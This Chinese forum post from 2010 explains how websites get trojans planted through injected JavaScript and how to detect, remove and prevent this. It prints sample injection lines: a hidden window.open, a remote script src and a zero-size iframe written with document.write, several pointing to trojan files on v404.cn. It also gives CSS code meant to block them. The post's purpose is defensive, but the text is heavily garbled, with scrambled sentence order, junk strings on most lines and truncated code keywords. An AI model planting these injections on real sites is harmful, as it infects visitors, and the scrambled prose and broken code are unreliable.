|
网站被JS挂马解决方法
! x: b* f) ?; ~为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范
2 x) h8 T1 \8 j6 o# U: FIFRAME 和 JS 脚本挂马。
; s( A' i l7 d/ q检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp, 6 Y# @- q( D L8 L! Q- r& u2 v: c/ ~
网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、 $ ?2 }% G* e4 N; H$ J' D4 B
如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .
G9 W J' L: |9 Q: F相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的 # y5 G. V I4 X4 f
卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马
4 m& A4 y& F# |8 E$ r- U利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权
( @3 [' {4 H7 \, K$ m8 X) I- T, C。一千多位会员的 ID ) @$ p9 l: j7 V" y; a4 q0 y$ b T9 _
2: 如何检测网页是否被挂马。
0 r7 z- T* w. X, v5 D六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>
( }- ^% e5 j* i或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全
1 W5 E" X6 v# O- n因素。
2 googl 检测。>
: Q! J2 J; l; }$ [9 P常用的杀毒软件也可以检测出来。
3 杀毒软件检测。> 4 z) u% u$ }/ J/ ?
打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
: J* A: L8 I* S; F% l5 使用 McAfee SiteAdvisor 平安浏览网页的插件。
7 c) D7 D" [9 ~" p0 v8 o" y+ E* C" _9 Y; ?0 w! z( O, k0 l
3: 如何清除网页木马。 ' n ~1 s8 O* |7 ]6 N
就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进 / x' `% m1 |3 b2 h/ W8 n1 l/ Y
入源文件把相关的网页挂马种类的可疑代码删除。 " R7 o) ^. L! v5 U
建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟
( s% d1 }" i, l+ g) R5 P& R悉。> " b# K( K8 \) j8 O& i3 K9 S
请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>
$ D7 E1 V9 @9 |# f2 q并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。> $ p+ @) ]0 q+ G: U
2 保证你所使用的顺序及时的更新。
2 q. E' b& `) r/ r! I, p3 不要在前台网页上加注后台管理程序登陆页面的链接。
5 t* O- a, G- P5 r& b8 m但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>
0 Y0 u0 Z) a' l; a, s; [不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>
1 {5 \: r1 S9 c& \+ c6 Y* g二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。
9 x" t; }' O2 q0 g0 Z设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。
4 I2 o" a8 q. |8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客
! r) O% k1 ?, w7 S8 j
1 X9 r. [+ `. Q ]IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式 9 j. z# R8 ?1 n1 M( L% ]9 b
。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。 " [& p# l E4 j2 o8 @' j3 I
JS 挂马溯源 ( s$ o" |0 n' l/ U1 I5 t' I
有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方 * h( S; w: f" S$ A0 o
法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。
0 R" x; [ z8 d( X3 w很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS 7 T, H. U, L2 i2 g! O) ~) V9 q
脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。
# A% j' F2 Q0 U5 K9 q# H, K3 m; Q一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示
6 e0 H; t' Y9 H' e1 E/ a: l大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而 : L4 F! _# o2 d# H
JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。
4 m- Y" t+ c; ~- ]; J8 M; H4 t) N但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编
I. Z$ A1 v7 b L3 |程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS ( D( w9 e" m# F+ s8 y% K
脚本在工作中会有很大的协助。
9 v1 B& |" r7 P+ Q) ]2 `挂马原理一点通 ' t4 c# R1 z/ a; z0 Y( \/ y
可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以 2 @) T7 y0 E) b
通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,
6 E4 J( w4 S: l; H w0 B6 y% @/ r6 x无从区分木马在何处。
4 b$ O2 {0 s' K9 h, ]) x) E+ \如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂 4 ^" p6 _% O7 j+ U5 A
马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很 8 C- |. t- r* B* y% ` @% Y
容易蒙混过关,导致木马久杀不绝。 5 W& h( C) m6 B+ @
JS 挂马攻防实录 0 K7 ^& u C) H: ^: g+ m7 N0 X! W
一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的
- u8 s; W# h; \. l, N' }9 a' z' k挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。
1 _( w. T% z% L" R. T2 Z# Q% Y这种方法使用的关键代码如下: ! x; o" a% m& r+ E% m
"", window.open "http://www.v404.cn/ 木马
: A& u7 G: v! n7 T. Y.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;
: P* [2 }) A! O) K' h/ @& m5 T
3 Z% s' @% B ?很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0
' W+ N2 _7 ?/ f+ k9 Z- P' G" K1 L: O) ?但是设置为 0 后,可能会出现恶意代码不运行的情况。
/ V, f/ I3 N% ^9 u# w并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “ . J! ?0 N6 S8 v* s" f9 e" l: _
document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件 & \2 }/ \ e: ~' ?! f$ f! Z
。
' u! E1 r& u+ f8 o<script src="http://www.v404.cn/ 木马脚本 .js"></script>
! b# ^$ k. q8 e0 b: {
; O/ ~4 R) [0 E$ @. `) p8 I5 L2 q或者
+ g) J5 X L% v jdocument.writ "<div style='display:none'>"
. Y+ S- ]* n8 A; K- D8 h+ hdocument.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"
& M4 q/ p& F4 \# K7 |2 |( \; Vdocument.writ "</div>"
% A$ M; S: e2 R+ r1 C" B( X' ~' G+ c! Z ?& o; \) r$ b8 W+ F
就成功地将木马挂到对方的网页中了
. P# a/ d" P. @例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。 # m& s: E+ r( j+ C. s/ D$ N
<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">
" v6 e- D3 d2 ?: T2 m1 A; U9 a或者: ! E$ r/ ?0 [- p, k/ C6 c# I
<ifram src="vbscript:[ 挂马脚本 ]"> $ Z( x* J9 q4 L4 @% g# |3 R
+ G, d6 r3 ?, k- d
等等 …
; P L: K; W- t, @' ?3 y9 F, } j Z不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法
' |. y3 y, Q, m就是阻止 Src 请求的异地外域的 JS 脚本,代码如下: & I0 x% x7 f9 Q% U( ?9 |
iframe{mdy1:express this.src='about:blank', < iframe{mdy1:express this.src='about:blank'.this.outerHTML='' / N- ` x! c) y2 v
;}
% n4 x V$ F/ H4 _, `script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
. E, W$ _2 @- C( a# \: p, y) R7 Z' W+ R
不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。 ; @* q1 Y& a1 H) B* k9 J2 S) j- V
这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的 6 W! h3 ]" u( _) C w6 s
CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了
$ y, Y' {3 Y3 g7 I" ~, b' \Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。 ; H; ]+ p" k: W/ B5 S! t) ?6 S" ~
<title> 让 JS 挂马中止的 CSS 代码 </title> 8 A; ^$ q) }0 u. |9 l- f
<styl type="text/css" id="shudoo"> , O" ^# Y2 t* S5 z
/*<![CDATA[*/ & v) z% V: ?$ O" H
this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.} : h* A. Q% v5 x" r+ n& k9 _
script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;} 0 O9 I- ~' b: O3 m
/*]]>*/ # l8 Z% u$ [; }7 J" U
</style>
| 
发表于 2010-11-10 08:17:49
千斤顶
显身卡
鲁公网安备 37021102000261号